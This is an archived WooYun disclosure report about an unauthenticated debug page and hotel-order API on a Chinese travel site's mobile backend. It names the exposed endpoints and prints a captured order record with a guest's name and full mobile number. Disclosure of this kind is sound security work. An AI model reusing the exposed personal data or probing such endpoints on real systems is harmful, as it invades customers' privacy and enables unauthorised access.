同程旅游网移动端某处接口未授权

编号149982
Urlhttp://www.wooyun.org/bug.php?action=view&id=149982
漏洞状态厂商已经确认
漏洞标题同程旅游网移动端某处接口未授权
漏洞类型未授权访问/权限绕过
厂商苏州同程旅游网络科技有限公司
白帽子1937nick
提交日期2015-10-28 09:48:00
公开日期2015-12-12 09:58:00
修复时间(not set)
确认时间2015-10-28 00:00:00
Confirm Spend0
漏洞标签敏感接口缺乏认证
关注数0
收藏数0
白帽评级
白帽自评rank3
厂商评级
厂商评rank5
漏洞简介
麻麻:说标题不能太
还是高rank 送京东礼品卡就好
漏洞细节

漏洞位置:URL:http://tcmobileapi.17usoft.com/Movie/default.aspx

1.png


来测试一下酒店接口地址:http://tcmobileapi.17usoft.com/hotel/orderhandler.ashx

"response":
{
"header":
{
"rspType":"0",
"rspCode":"0000",
"rspDesc":"查询成功"
},
"body":
{
"serialId":"hh55bddu67210024u610",
"orderFlag":"未入住",
"hotelId":"2111",
"hotelName":"北京丽苑公寓",
"hotelLinkPhone":"010-65258855",
"roomName":"敞开式套房",
"address":"王府井金鱼胡同18号近校尉胡同",
"totalPrice":"1680.00",
"realTotalPrice":"1680",
"comeDate":"2015-08-02",
"leaveDate":"2015-08-03",
"creationTime":"2015/8/2 17:09:59",
"rooms":"1",
"comeTime":"18:00",
"contactName":"7990862870D539A4",
"contactMobile":"13536848017",
"theNewContactMobile":"135****8017",
"guestName":"恩旺",
"guestMobile":"13536848017",
"theNewGuestMobile":"135****8017",
"otherGuests":"",
"remark":"",
"isAbleComment":"0",
"isGuarantee":"0",
"isCancelable":"0",
"isAblePay":"0",
"isCanDelete":"1",
"paymentType":"到店付款",
"guaranteeAmount":"0.00",
"couponPrice":"100.00",
"commentPrice":"0",
"invoiceName":"",
"invoiceRise":"",
"invoiceAddress":"",
"invoiceFee":"0",
"invoiceMobile":"",
"orderAmountDetailList":[
{
"amountAdvice":"1680.00",
"breakfast":"单份",
"stayDate":"20150802"
}],
"isProcess":"0",
"introduction":"",
"copywriter":"",
"commentTip":"",
"commentCashMoney":"",
"returnCashMoneyAll":"",
"isPromo":"0",
"currency":"0",
"isAbleSubmitCheckInfo":"0",
"isAbleChange":"0",
"policyId":"1401276",
"roomTypeId":"569761",
"supplierId":"74475",
"RemindCheckRoom":"0",
"RemindConfirm":"0",
"OtherGuaranteeAmount":"0.00",
"OtherCurrency":"0",
"OtherOrderPrice":"1680.00",
"platId":"",
"redEnvelopeAmount":"0"
}
}
}


2.png


要测试内容可以看这个漏洞http://wooyun.org/bugs/wooyun-2010-0137596
我就不在测试了 上次已经修复了 现在是第三次了

POC

http://wooyun.org/bugs/wooyun-2010-0137596

修复方案

还好我做过研发 把调试页面删除

状态信息 2015-10-28: 细节已通知厂商并且等待厂商处理中
2015-10-28: 厂商已经确认,细节仅向厂商公开
2015-11-07: 细节向核心白帽子及相关领域专家公开
2015-11-17: 细节向普通白帽子公开
2015-11-27: 细节向实习白帽子公开
2015-12-12: 细节向公众公开
厂商回复感谢关注同程旅游
回应信息危害等级:低漏洞Rank:5 确认时间:2015-10-28 09:56